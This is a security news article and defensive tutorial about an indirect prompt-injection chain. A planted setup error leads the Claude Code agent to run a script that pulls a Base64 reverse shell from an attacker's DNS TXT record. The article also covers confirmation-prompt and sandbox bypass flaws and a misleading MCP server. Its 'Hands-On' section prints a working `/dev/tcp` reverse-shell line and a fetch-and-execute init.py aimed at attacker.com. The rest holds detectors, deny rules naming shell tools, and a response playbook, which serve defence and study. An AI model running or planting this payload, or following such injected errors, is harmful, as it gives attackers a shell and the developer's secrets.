New Claude Code Attack Turns Clean GitHub Repositories into Developer Machine Takeover Vectors – No Malicious Code Required + Video

Introduction:

A newly disclosed proof-of-concept attack demonstrates how AI-powered coding agents like Anthropic’s Claude Code can be silently weaponized against developers through a technique called indirect prompt injection. Published on June 25, 2026, by Mozilla’s Zero Day Investigative Network (0DIN), the attack shows that a completely clean-looking GitHub repository can trick Claude Code into opening a reverse shell on a developer’s machine without a single line of malicious code ever appearing in the repository itself. The result is catastrophic: a fully interactive shell running under the developer’s own user privileges, with access to every secret in the environment—from `ANTHROPIC_API_KEY` to `AWS_SECRET_ACCESS_KEY` and `GITHUB_TOKEN`.

Learning Objectives:

  • Understand the mechanics of indirect prompt injection and how AI coding agents can be manipulated through seemingly legitimate error messages and DNS-based payload delivery.
  • Identify the attack chain components—from repository cloning to DNS TXT record retrieval—and learn to detect each stage using static analysis, network monitoring, and behavioral indicators.
  • Implement practical defensive measures including sandboxing, permission scoping, command approval workflows, and runtime detection to protect developer workstations and CI/CD pipelines.

You Should Know:

  1. The Three-Step Attack Chain: How a Clean Repository Opens a Reverse Shell

The 0DIN researchers demonstrated that the compromise happens with “no exploit code, no warning, no suspicious command anyone had to approve”. The attack relies on three components that separately represent no threat and raise no suspicion:

  • Step 1 – The Benign Repository: A clean-looking GitHub repository with standard setup instructions, such as installing dependencies and initializing the project (e.g., `pip3 install -r requirements.txt`, `python3 -m axiom init`). The repository contains no obvious malicious instructions or malicious code, which helps it avoid raising immediate red flags.

  • Step 2 – The Engineered Error: The Python package is intentionally designed to refuse execution until it has been initialized. It generates an error instructing the user to execute `python3 -m axiom init`. Claude Code treats this as a normal setup issue and automatically runs the suggested command while attempting to recover from the error.

  • Step 3 – DNS-Based Payload Retrieval: Executing `python3 -m axiom init` calls a shell script that retrieves a configuration value stored in a DNS TXT record controlled by the attacker. The DNS value is Base64-encoded, meaning the reverse-shell payload does not appear in plaintext inside the repository or network traffic. The retrieved value is then executed as a command.

As the 0DIN researchers explain: “Claude Code never decided to open a shell. It decided to fix an error. The reverse shell is three indirection steps away from anything Claude Code actually evaluated: an error message it trusted, a script that fetched a value, and a DNS record it never saw”. The attacker now has an interactive shell running as the developer’s own user.

  2. Hands-On: Simulating the Attack Vector (Educational Purpose Only)

To understand the mechanism, security professionals can simulate the DNS TXT record retrieval technique in a controlled lab environment. The following demonstrates how an attacker might stage the external payload:

Setting Up the DNS TXT Record (Attacker Infrastructure):

```text
# On the attacker-controlled DNS server, add a TXT record
# Example using a BIND zone file:
axiom-config IN TXT "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"
```

Or using a cloud DNS provider via API (conceptual). The TXT record value is typically Base64-encoded so that the shell command never appears in plaintext:

```bash
echo -n "bash -i >& /dev/tcp/192.168.1.100/4444 0>&1" | base64
# Output: YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTAwLzQ0NDQgMD4mMQ==
```

The Malicious Setup Script (axiom/init.py):

```python
import base64
import subprocess
import sys

import dns.resolver  # dnspython


def fetch_and_execute():
    # Query the attacker-controlled DNS TXT record
    resolver = dns.resolver.Resolver()
    resolver.nameservers = ['8.8.8.8']  # or the attacker's own DNS server
    try:
        answers = resolver.resolve('axiom-config.attacker.com', 'TXT')
        for rdata in answers:
            # Decode the Base64 payload and execute it with output suppressed
            payload = base64.b64decode(rdata.strings[0]).decode()
            subprocess.Popen(payload, shell=True,
                             stdout=subprocess.DEVNULL,
                             stderr=subprocess.DEVNULL)
    except Exception as e:
        # This is the only thing the user (and Claude Code) ever sees
        print(f"Initialization error: {e}")
        sys.exit(1)


if __name__ == "__main__":
    fetch_and_execute()
```

Detection Commands (Linux/macOS):

```bash
# Monitor for DNS TXT queries on the wire (-l keeps the pipe line-buffered)
sudo tcpdump -i any -l -v udp port 53 | grep -i "TXT"

# Check for unexpected established outbound connections
sudo netstat -tunap | grep ESTABLISHED | grep -v "127.0.0.1"

# Audit running processes for a Python module init or a /dev/tcp shell
ps aux | grep -E "python.*axiom|bash.*dev/tcp"
```
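The tcpdump line above only shows that a TXT lookup happened; what matters is the answer, and in this attack the answer is Base64. The following added example (written for this article, not part of the 0DIN write-up or any tool it describes) triages TXT answers from a resolver log: it decodes values that look like Base64 and flags any that decode to shell-like commands, while leaving ordinary Base64 configuration values for review. The log format and the domain names are constructed for the example; the second sample value is the Base64 string shown earlier on this page.

```python
import base64
import binascii
import re

# Constructed sample of TXT answers as a resolver log might record them: name, type, value.
SAMPLE_TXT_LINES = [
    '_dmarc.example.com TXT "v=DMARC1; p=reject"',
    'axiom-config.attacker.example TXT "YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTAwLzQ0NDQgMD4mMQ=="',
    'config.vendor.example TXT "dmVyc2lvbj0xLjIuMw=="',
]

# Shell-like fragments worth a human look once a value is decoded (extend for your environment).
SHELL_INDICATORS = re.compile(
    r"/dev/tcp/|bash -i|\bnc\b.*-[ec]\b|mkfifo|python3? -c|curl .*\|\s*(ba)?sh|powershell", re.I
)
# A Base64 token long enough to be interesting: only the alphabet, optional padding at the end.
BASE64_TOKEN = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")
TXT_LINE = re.compile(r'^(\S+)\s+TXT\s+"(.*)"\s*$')


def decode_if_base64(value):
    """Return the decoded text if value is a plausible Base64 string, otherwise None."""
    token = value.strip()
    if not BASE64_TOKEN.match(token):
        return None
    try:
        return base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


def triage_txt_record(value):
    """Classify one TXT value: ('shell-like payload' | 'base64, review' | 'benign', text)."""
    decoded = decode_if_base64(value)
    text = decoded if decoded is not None else value
    if SHELL_INDICATORS.search(text):
        return "shell-like payload", text
    if decoded is not None:
        return "base64, review", decoded
    return "benign", value


def triage_dns_log(lines):
    """Return (name, verdict, text) for every non-benign TXT line in the log."""
    findings = []
    for line in lines:
        m = TXT_LINE.match(line.strip())
        if not m:
            continue
        name, value = m.groups()
        verdict, text = triage_txt_record(value)
        if verdict != "benign":
            findings.append((name, verdict, text))
    return findings


if __name__ == "__main__":
    for name, verdict, text in triage_dns_log(SAMPLE_TXT_LINES):
        print(f"[{verdict}] {name}: {text}")
```

Feed it the TXT answers from your resolver or Zeek `dns.log` export; the `base64, review` verdict is deliberately separate from the shell verdict so that legitimate encoded configuration (the third sample line) ends up in a review queue rather than an alert.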

Windows Detection Equivalent (PowerShell):

```powershell
# Monitor DNS Client events for TXT lookups (query type 16). The operational log is
# disabled by default; enable it first with:
#   wevtutil sl Microsoft-Windows-DNS-Client/Operational /e:true
Get-WinEvent -LogName "Microsoft-Windows-DNS-Client/Operational" |
    Where-Object { $_.Message -match "type 16\b|TXT" }

# Check for established connections to common reverse shell ports
Get-NetTCPConnection -State Established |
    Where-Object { $_.RemotePort -eq 4444 -or $_.RemotePort -eq 1337 }
```

  3. Exploitation via MCP Protocol and Command Injection Bypasses

Beyond the DNS-based attack, researchers have identified multiple vulnerability vectors in Claude Code’s architecture. The Model Context Protocol (MCP) allows AI tools to interact with external services like Jira, Confluence, GitHub, databases, and internal APIs. A published proof-of-concept demonstrates how a malicious MCP server can mislead users into approving arbitrary command execution by misrepresenting tool parameters in confirmation prompts. The vulnerability allows an attacker-controlled server to present a benign description (e.g., “Read a file”) while the underlying execution logic triggers a reverse shell or unauthorized file writes.

Additionally, CVE-2026-24887 (CVSS 7.7 High) details a command injection vulnerability where an error in command parsing allowed bypass of the Claude Code confirmation prompt to trigger execution of untrusted commands through the `find` command. Reliably exploiting this required the ability to add untrusted content into a Claude Code context window. This vulnerability affects versions prior to 2.0.72.

Verification Commands:

```bash
# Check the Claude Code version
claude --version

# Update to the patched version (2.0.72 or later)
npm update -g @anthropic-ai/claude-code

# Verify the update
npm list -g @anthropic-ai/claude-code
```

  4. Information Disclosure and Sandbox Bypass Vulnerabilities

CVE-2026-21852 (Check Point CPAI-2026-5741) describes an information disclosure vulnerability in Anthropic Claude Code that allows attacker-controlled repositories to exfiltrate sensitive data, including Anthropic API keys, before users confirm trust. Versions prior to 2.0.65 are affected.

The network sandbox mechanism, designed to prevent sensitive data leakage through local proxies and allowlist rules, has been found to have a semantic inconsistency between its policy judgment and its actual network execution. When input contains invisible control characters (for example null bytes or unusual encodings), the filtering logic and the parsing logic can reach different results, so access control can be bypassed: a request judged legitimate in the security check stage may be directed to a completely different external host when the connection is actually made, forming a data leakage channel.
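The inconsistency described above is a parser differential: the policy check and the connector derive the host from the same input by different rules. The added example below is illustrative Python written for this article; it is not Claude Code's sandbox code and makes no claim about how that bypass works internally. It reproduces the class of bug with a null byte: a judgment stage that strips control characters and suffix-matches the allowlist approves a name that a C-string style connector truncates to a different host. `hardened_host` shows the fix: reject anything outside the hostname alphabet before comparing, match the allowlist exactly, and make the connector use the validated value. The URLs and allowlist are constructed.

```python
import re
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"api.anthropic.com", "github.com"}

# Constructed inputs: one legitimate request and one hostname carrying a null byte.
LEGIT_URL = "https://api.anthropic.com/v1/messages"
CONTROL_CHAR_URL = "https://evil.example\x00.api.anthropic.com/v1/messages"


def weak_policy_allows(url):
    """The judgment stage, written the fragile way: sanitise first, then suffix-match."""
    host = urlsplit(url).hostname or ""
    cleaned = re.sub(r"[\x00-\x1f\x7f]", "", host)  # silently drops the control characters
    return any(cleaned == h or cleaned.endswith("." + h) for h in ALLOWED_HOSTS)


def connector_host(url):
    """The execution stage, modelled on a C-string consumer: the name ends at the first NUL."""
    host = urlsplit(url).hostname or ""
    return host.split("\x00", 1)[0]


def demonstrate_mismatch():
    """Returns (policy verdict, host actually contacted) for the control-character URL."""
    return weak_policy_allows(CONTROL_CHAR_URL), connector_host(CONTROL_CHAR_URL)


def hardened_host(url):
    """One validation whose result the connector must use verbatim; raises instead of redirecting."""
    host = urlsplit(url).hostname
    if not host:
        raise ValueError("no hostname")
    # Only letters, digits, '.' and '-' may reach a resolver; anything else is rejected, not stripped.
    if not re.fullmatch(r"[a-z0-9.-]+", host):
        raise ValueError("hostname contains control, whitespace or non-ASCII characters")
    if host not in ALLOWED_HOSTS:  # exact match, no suffix logic
        raise ValueError(f"{host!r} is not on the allowlist")
    return host


def hardened_rejects(url):
    """True if the hardened check refuses the URL."""
    try:
        hardened_host(url)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("weak policy:", demonstrate_mismatch())
    print("hardened:", hardened_host(LEGIT_URL), hardened_rejects(CONTROL_CHAR_URL))
```

The design point is that the connector never parses the URL a second time: it receives the string the policy validated, so the two stages cannot disagree.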

Check Point IPS Protection Configuration:

  • In Security Gateway R81/R80/R77/R75, navigate to the IPS tab > Protections
  • Search for: "Anthropic Claude Code Information Disclosure (CVE-2026-21852)"
  • Enable the protection and install policy on all Security Gateways

Network Monitoring Rule (Snort/Suricata):

```text
# Detect DNS TXT queries for names containing an "attacker" or "malicious" label:
# standard query header (flags 0x0100, one question), a QNAME label in DNS wire
# format (length byte followed by the label), then the TXT/IN question type
alert udp $HOME_NET any -> any 53 (msg:"Suspicious DNS TXT Query"; \
    content:"|01 00 00 01 00 00 00 00 00 00|"; offset:2; depth:10; \
    content:"|00 10 00 01|"; distance:0; \
    pcre:"/\x08attacker|\x09malicious/"; \
    classtype:policy-violation; sid:20260001; rev:1;)
```

  5. Defensive Measures: Securing AI Coding Agents in Development Environments

The attack demonstrates how AI coding agents can become execution bridges between untrusted repositories and developer machines. For CISOs and security teams, the key issue is trust transfer—developers may trust Claude Code to interpret errors and fix setup problems, but attackers can manipulate that workflow by placing malicious instructions several steps away from the visible repository content.

Recommended Defensive Controls:

A. Permission Scoping and Identity Governance:

AI coding agents should have tightly scoped permissions, short-lived credentials, and access only to the resources required for their specific tasks. Implement the principle of least privilege for all agentic tools.

B. Command Approval Workflow Hardening:

Keep Claude Code in its default prompt-before-run mode and deny known-bad shell patterns outright. Create or modify `~/.claude/settings.json` (deny entries use the `Bash(pattern)` rule syntax of Claude Code's permissions). Allowlisting of outbound domains (`api.anthropic.com`, `github.com`) belongs at the egress proxy or network sandbox rather than in this file:

```json
{
  "permissions": {
    "defaultMode": "default",
    "deny": [
      "Bash(bash -i*)",
      "Bash(nc -e*)",
      "Bash(python3 -m axiom init*)"
    ]
  }
}
```

C. Runtime Detection and Monitoring:

0DIN researchers suggest that AI agents should disclose the full execution chain of setup commands, including scripts and code fetched dynamically at runtime. Implement the following monitoring:

Linux Audit Rules (auditd):

```bash
# Record every execve() of the python3 binary (catches "python3 -m <module> init")
auditctl -a always,exit -F arch=b64 -S execve -F exe=/usr/bin/python3 -k python_module_exec

# Record successful outbound IPv4 connect() calls (a2=16 is the sockaddr_in length).
# auditd cannot see DNS record types, so pair this with the tcpdump/Suricata rules above.
auditctl -a always,exit -F arch=b64 -S connect -F a2=16 -F success=1 -k outbound_connection
```

Windows PowerShell Monitoring Script:

```powershell
# Log a warning when a newly created process looks like an AI-agent setup command gone wrong.
# Win32_ProcessStartTrace does not carry the command line, so subscribe to Win32_Process creation.
# One-time setup for the custom event source (run elevated):
#   New-EventLog -LogName Application -Source "AI-Agent-Monitor"
Register-WmiEvent -Query "SELECT * FROM __InstanceCreationEvent WITHIN 2 WHERE TargetInstance ISA 'Win32_Process'" `
    -SourceIdentifier "AIAgentMonitor" -Action {
        $proc = $Event.SourceEventArgs.NewEvent.TargetInstance
        if ($proc.Name -match "python|bash|cmd" -and
            $proc.CommandLine -match "axiom|dev/tcp|reverse|shell") {
            Write-EventLog -LogName "Application" -Source "AI-Agent-Monitor" `
                -EntryType Warning -EventId 1001 -Message "Suspicious command: $($proc.CommandLine)"
        }
    }
```
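Once the auditd rules above are loaded, each `python3` launch produces a SYSCALL record and an EXECVE record that share one event id; the argv lives in the EXECVE record, and auditd hex-encodes any argument containing spaces instead of quoting it. The added example below (written for this article, not a 0DIN or Anthropic tool) parses constructed audit lines, reassembles argv per event, decodes hex-encoded arguments, and flags the `python3 -m <module> init` shape from the attack chain together with interactive-shell patterns. The sample lines are constructed; the key names come from the rules above.

```python
import re
from collections import defaultdict

# Constructed audit records in the shape auditd writes for the rules above (key names from those rules).
# Arguments containing spaces are hex-encoded by auditd instead of quoted (event 4569 shows this).
SAMPLE_AUDIT_LINES = [
    'type=SYSCALL msg=audit(1718000000.101:4567): arch=c000003e syscall=59 success=yes exit=0 '
    'a0=55d0c0 a1=55d1a0 a2=55d2b0 a3=0 items=2 ppid=4321 pid=4400 auid=1000 uid=1000 '
    'comm="python3" exe="/usr/bin/python3" key="python_module_exec"',
    'type=EXECVE msg=audit(1718000000.101:4567): argc=4 a0="python3" a1="-m" a2="axiom" a3="init"',
    'type=SYSCALL msg=audit(1718000000.205:4568): arch=c000003e syscall=59 success=yes exit=0 '
    'ppid=4321 pid=4410 auid=1000 uid=1000 comm="python3" exe="/usr/bin/python3" key="python_module_exec"',
    'type=EXECVE msg=audit(1718000000.205:4568): argc=3 a0="python3" a1="-m" a2="pytest"',
    'type=EXECVE msg=audit(1718000000.310:4569): argc=3 a0="bash" a1="-c" a2=62617368202d69',
]

EVENT_ID = re.compile(r"msg=audit\(\d+\.\d+:(\d+)\)")
ARGV_FIELD = re.compile(r'\ba(\d+)=(?:"([^"]*)"|([0-9A-Fa-f]+))')  # quoted or hex-encoded argument
KV_FIELD = re.compile(r'\b(\w+)=(?:"([^"]*)"|(\S+))')

# Command shapes worth an alert: the page's setup trigger, an interactive shell, a /dev/tcp redirect.
SUSPICIOUS_ARGV = [
    re.compile(r"^python3? -m \S+ init$"),
    re.compile(r"\b(ba)?sh -i\b"),
    re.compile(r"/dev/tcp/"),
]


def parse_audit(lines):
    """Group SYSCALL/EXECVE records by event id: {event_id: {field: value, 'argv': [...]}}."""
    events = defaultdict(dict)
    for line in lines:
        m = EVENT_ID.search(line)
        if not m:
            continue
        rec = events[m.group(1)]
        if line.startswith("type=EXECVE"):
            argv = {}
            for idx, quoted, hexed in ARGV_FIELD.findall(line):
                argv[int(idx)] = quoted if quoted else bytes.fromhex(hexed).decode("utf-8", "replace")
            rec["argv"] = [argv[i] for i in sorted(argv)]
        elif line.startswith("type=SYSCALL"):
            for key, quoted, bare in KV_FIELD.findall(line):
                rec[key] = quoted if quoted else bare
    return events


def flag_suspicious(events):
    """Return one finding per event whose reassembled command line matches a suspicious shape."""
    findings = []
    for event_id, rec in events.items():
        argv = rec.get("argv")
        if not argv:
            continue
        cmd = " ".join(argv)
        if any(p.search(cmd) for p in SUSPICIOUS_ARGV):
            findings.append({"event": event_id, "cmd": cmd, "exe": rec.get("exe"),
                             "ppid": rec.get("ppid"), "uid": rec.get("uid")})
    return findings


if __name__ == "__main__":
    for finding in flag_suspicious(parse_audit(SAMPLE_AUDIT_LINES)):
        print(finding)
```

The `ppid` field is the useful pivot: when the parent of the flagged `python3` is the agent process, the finding is exactly the "error recovery" execution the article describes rather than a developer typing the command by hand.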

D. Repository Scanning and Validation:

Implement automated scanning of GitHub repositories for indirect prompt injection patterns. The OWASP Prompt Injection Prevention Cheat Sheet identifies code comments, documentation, commit messages, and merge request descriptions as potential vectors for malicious instructions.

Python Scanner Snippet:

```python
import os
import re


def scan_repo_for_suspicious_patterns(repo_path):
    # Command shapes that match the three-step chain: a module "init" trigger,
    # chained installs, DNS TXT lookups piped into a shell, curl piped into sh
    suspicious_patterns = [
        r'python3? -m \w+ init',
        r'pip3? install .* && .*',
        r'dig.*TXT.*&&',
        r'nslookup.*TXT.*\|.*bash',
        r'curl.*\|.*sh',
    ]

    findings = []
    for root, _dirs, files in os.walk(repo_path):
        for file in files:
            if file.endswith(('.py', '.sh', '.md', '.txt')):
                filepath = os.path.join(root, file)
                with open(filepath, 'r', encoding='utf-8', errors='ignore') as f:
                    content = f.read()
                for pattern in suspicious_patterns:
                    if re.search(pattern, content, re.IGNORECASE):
                        print(f"[!] Suspicious pattern found: {filepath} -> {pattern}")
                        findings.append((filepath, pattern))
    return findings
```

  6. Enterprise Mitigation Strategy and Incident Response

Organizations should treat this as a developer workstation and AI agent governance issue, not only as a repository security problem. The following enterprise-grade controls are recommended:

Network Segmentation:

  • Isolate developer workstations from production environments
  • Implement egress filtering to block outbound reverse shell connections
  • Use a forward proxy with allowlist for outbound traffic

Credential Hardening:

  • Rotate API keys and tokens frequently
  • Use short-lived credentials with automatic expiration
  • Implement secrets rotation for `ANTHROPIC_API_KEY`, `AWS_SECRET_ACCESS_KEY`, and `GITHUB_TOKEN`

Incident Response Playbook for Suspected AI Agent Compromise:

```bash
# 1. Immediate isolation - kill suspicious processes
pkill -f "python3 -m axiom"; pkill -f "bash.*dev/tcp"

# 2. Revoke the exposed credentials (long-lived IAM key shown; temporary STS
#    sessions are revoked through the role's IAM policy)
aws iam delete-access-key --access-key-id "$COMPROMISED_KEY"
gh auth logout

# 3. Capture forensic artifacts
sudo tar -czf /tmp/forensic_$(date +%Y%m%d_%H%M%S).tgz \
    ~/.bash_history ~/.claude/ ~/.aws/ ~/.ssh/ /var/log/syslog

# 4. Network isolation - block outbound to suspicious IPs
sudo iptables -A OUTPUT -d ATTACKER_IP -j DROP

# 5. Force credential rotation for all developers
#    Implement an organization-wide API key rotation policy
```

What Undercode Say:

  • Key Takeaway 1: The attack exploits trust at multiple levels—trust in the repository’s apparent cleanliness, trust in the AI agent’s error recovery logic, and trust in DNS resolution. The three indirection steps (error message → script → DNS record) ensure that no single component appears malicious, making detection through traditional static analysis nearly impossible.

  • Key Takeaway 2: Identity governance for AI agents is no longer optional. As Sanjar K. notes, “These agents should have tightly scoped permissions, short-lived credentials, and access only to the resources required for their specific tasks.” The attack succeeds because Claude Code runs with the developer’s full privileges—the same privileges that access AWS, GitHub, and internal systems.

The attack chain reveals a fundamental paradigm shift in cybersecurity: AI agents are no longer passive tools but active execution environments that can be socially engineered through indirect means. The DNS TXT record technique is particularly insidious because it decouples the malicious payload from the repository itself, defeating both human code review and automated security scanners. Organizations must now treat AI coding agents as privileged execution contexts requiring the same level of scrutiny as any other system component with network access and command execution capabilities.

The Mozilla 0DIN researchers’ demonstration should serve as a wake-up call for security teams. The attack does not require sophisticated exploitation techniques—it merely leverages the AI agent’s natural behavior of automatically “fixing” errors during setup workflows. This is not a vulnerability in the AI model itself but rather a design flaw in how we integrate AI agents into development workflows without proper security boundaries.

Prediction:

  • +1 The disclosure of this attack vector will accelerate the development of AI-specific security frameworks and runtime protection mechanisms. We can expect to see new open-source tools for detecting indirect prompt injection in repositories, similar to how SAST tools emerged for code vulnerabilities.

  • -1 Threat actors will rapidly weaponize this technique, distributing poisoned repositories through fake job postings, tutorials, blog posts, and direct messages. The low barrier to entry means we will see widespread exploitation within 3-6 months.

  • -1 Supply chain attacks will evolve to incorporate indirect prompt injection as a stealthy persistence mechanism. Attackers will target popular open-source projects by submitting pull requests that appear to fix setup errors but actually introduce the three-step indirection chain.

  • +1 AI vendors like Anthropic will implement mandatory command approval workflows that cannot be bypassed, along with sandboxing that restricts AI agents to minimal privileges. Version 2.0.72 and later already address some of these issues.

  • -1 The attack highlights a critical gap in developer security training. Most developers are unaware that AI agents can be manipulated through seemingly legitimate error messages, creating a massive educational and policy gap that will take years to close.

Reported By: Cybersecuritynews Share – Hackers Feeds